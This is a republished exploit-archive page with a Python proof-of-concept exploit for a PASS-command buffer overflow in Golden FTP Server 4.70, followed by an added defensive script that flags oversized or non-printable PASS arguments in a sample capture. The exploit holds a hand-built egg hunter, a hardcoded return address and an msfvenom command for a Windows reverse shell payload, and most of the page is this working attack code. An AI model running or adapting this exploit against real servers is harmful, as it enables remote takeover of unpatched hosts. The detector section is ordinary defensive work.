Golden FTP Server 4.70 Buffer Overflow ≈ Packet Storm – Digitalmunition





Published on March 11th, 2021


#!/usr/local/bin/python3
# Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)
# Author: 1F98D
# Original Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
# Tested on Windows 10 (x64)
#
# A buffer overflow exists in GoldenFTP during the authentication process.
# Note that the source IP address of the user performing the authentication
# forms part of the buffer and as such must be accounted for when calculating
# the appropriate offset. It should also be noted that the exploit is
# rather unstable and if exploitation fails, GoldenFTP will be left in
# a state where it will still accept connections, but it will be unable
# to handle or process them in any way, so be careful.
#

from socket import *
import sys

# Your address forms part of the buffer length calculation
SOURCE = '192.168.1.1'
TARGET = '192.168.1.2'
s = socket(AF_INET, SOCK_STREAM)
s.connect((TARGET, 21))

# msfvenom -p windows/shell_reverse_tcp -f python -b '\x00\x0a\x0d' LHOST=192.168.1.1 LPORT=4444
buf = b""

total_length = 545-len(SOURCE)
eip = b'\x7f\x79\x4c\x00'
hunter = b'\x90\x90\x90\x90\x90\x90' # padding ; nop slide to account for variable offset based on source ip
hunter += b'\xfd' # std ; set df flag so we search high to low
hunter += b'\xb8\x43\x42\x41\x40' # mov eax, 0x40414243 ; egg
hunter += b'\x89\xF7' # mov edi, esi ; start searching from esi
hunter += b'\x47' # inc edi
hunter += b'\x90' # nop
hunter += b'\x83\xC7\x03' # add edi, 0x3 ; scasd decrements by 4, add 3 so we search 1 by 1
hunter += b'\xaf' # scasd ; check for egg at edi
hunter += b'\x75\xfa' # short jnz -0x6 ; jump back to add edi, 0x3
hunter += b'\x83\xC7\x03' # add edi, 0x3
hunter += b'\xaf' # scasd
hunter += b'\x75\xfa' # short jnz -0x6
hunter += b'\x83\xC7\x1f' # add edi, 0x1f ; account for egg hunter
hunter += b'\xff\xe7' # jmp edi ; egg found, let's go!
hunter += b'\x90\x90\x90\x90\x90\x90' # padding ; nop slide to account for variable offset again

payload = hunter + buf + b'\x90'*(total_length-len(eip)-len(hunter)-len(buf)) + eip

s.send(b'USER anonymous\r\n')
print(s.recv(1024))
print(s.recv(1024))
s.send(b'PASS ' + payload + b'\r\n')
print(s.recv(1024))
s.send(b'QUIT\r\n')
print(s.recv(1024))
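From the defender's side, as an added example that is not part of the original exploit: the header above states that the vulnerable buffer is filled by the client's source IP plus the PASS argument, and the script sizes its payload to 545 minus the IP length. The check below applies that same budget to FTP control-channel commands from a constructed capture and also flags PASS arguments carrying non-printable bytes, which a real password sent over FTP would not. The capture layout, `BUFFER_BUDGET` and the function names are assumptions for this example.

```python
import re
from typing import List, Tuple

# The exploit sizes its payload to 545 - len(source_ip); reused here as the
# threshold at which source IP + password length reaches the overflow.
BUFFER_BUDGET = 545

# Constructed sample capture: (client_ip, raw control-channel line).
SAMPLE_CAPTURE = [
    ("192.168.1.1", b"USER anonymous\r\n"),
    ("192.168.1.1", b"PASS guest@example.com\r\n"),
    ("192.168.1.1", b"PASS " + b"\x90" * 8 + b"A" * 540 + b"\r\n"),  # sled bytes, over budget
    ("10.0.0.5", b"PASS " + b"B" * 200 + b"\r\n"),                   # long but printable, under budget
]

# FTP command line: 3- or 4-letter verb, optional space-separated argument.
CMD_RE = re.compile(rb"^(?P<verb>[A-Za-z]{3,4})(?: (?P<arg>.*))?$", re.S)


def inspect_pass(client_ip: str, line: bytes) -> List[str]:
    """Return the reasons a PASS command looks like an overflow attempt.

    'overflow'     : len(client_ip) + len(argument) reaches BUFFER_BUDGET,
                     the condition the exploit header describes.
    'nonprintable' : the argument carries bytes outside printable ASCII.
    Non-PASS commands and unparsable lines yield an empty list.
    """
    m = CMD_RE.match(line.rstrip(b"\r\n"))
    if not m or m["verb"].upper() != b"PASS":
        return []
    arg = m["arg"] or b""
    reasons = []
    if len(client_ip) + len(arg) >= BUFFER_BUDGET:
        reasons.append("overflow")
    if any(b < 0x20 or b > 0x7E for b in arg):
        reasons.append("nonprintable")
    return reasons


def scan_capture(capture) -> List[Tuple[int, str, List[str]]]:
    """Run inspect_pass over every (ip, line) pair; return (index, ip, reasons) hits."""
    hits = []
    for idx, (ip, line) in enumerate(capture):
        reasons = inspect_pass(ip, line)
        if reasons:
            hits.append((idx, ip, reasons))
    return hits


if __name__ == "__main__":
    for idx, ip, reasons in scan_capture(SAMPLE_CAPTURE):
        print(f"line {idx}: PASS from {ip} flagged: {', '.join(reasons)}")
```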
